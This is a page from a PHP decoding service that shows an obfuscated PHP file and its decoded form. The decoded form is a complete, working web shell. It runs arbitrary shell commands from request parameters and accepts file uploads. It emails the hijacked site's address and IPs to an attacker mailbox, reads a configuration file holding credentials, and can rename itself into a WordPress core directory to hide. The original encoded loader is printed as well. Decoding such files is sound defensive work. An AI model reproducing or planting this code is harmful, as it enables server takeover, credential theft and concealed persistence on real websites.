Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $c=gzinflate(str_rot13(base64_decode("rUp6YtpVEP7cVfkP03oqgy5gJ7mrKgfS9gi5UdeEHpC7D..

Decoded Output download

b'echo <<<html
<link rel="SHORTCUT ICON" href="http://www.zeroto60times.com/blog/wp-content/uploads/2013/02/ferrari-cars-logo-emblem.jpg">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>T E A M 2 4 H O U R S U N K N O W N </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td>
html;
?>
<?php
error_reporting(0);
if (!isset($_SESSION[\'bajak\']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get(\'safe_mode\');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER[\'SERVER_ADDR\']);
$injektor = gethostbyname($_SERVER[\'REMOTE_ADDR\']);
mail(\'[email protected]\', "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION[\'bajak\'] = 0;
}
else {$_SESSION[\'bajak\']++;};
if(isset($_GET[\'clone\'])){
$source = $_SERVER[\'SCRIPT_FILENAME\'];
$desti =$_SERVER[\'DOCUMENT_ROOT\']."/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get(\'safe_mode\');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>T E A M C O D E R</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,\'/\')){
if($u!=strlen($cwd)-1){
return $cwd.\'/\';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,\'\\')){
if($u!=strlen($cwd)-1){
return $cwd.\'\\';}
else{return $cwd;};
};
}
echo \'<form method="POST" action=""><br><br><font size=2 color=#888888><b>Command : </b><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>\';
echo \'<br><br><form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File : </b></font><input type=hidden name="submit"><input type=file name="userfile" size=28><br><br><font size=2 color=#888888><b>New name : </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>\';
if(isset($_POST[\'submit\'])){
$uploaddir = pwd();
if(!$name=$_POST[\'newname\']){$name = $_FILES[\'userfile\'][\'name\'];};
move_uploaded_file($_FILES[\'userfile\'][\'tmp_name\'], $uploaddir.$name);
if(move_uploaded_file($_FILES[\'userfile\'][\'tmp_name\'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST[\'command\'])){
$cmd = $_POST[\'cmd\'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET[\'cmd\'])){
$comd = $_GET[\'cmd\'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET[\'rf\'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec(\'ls -la\')."</font></pre>";
}
?>'

Did this file decode correctly?

Original Code

<?php
$c=gzinflate(str_rot13(base64_decode("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")));
echo($c);
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

$c echo <<<html <link rel="SHORTCUT ICON" href="http://www.zer..

Stats

MD5 2b819608c5c735b63ddf944676f50d2f
Eval Count 0
Decode Time 152 ms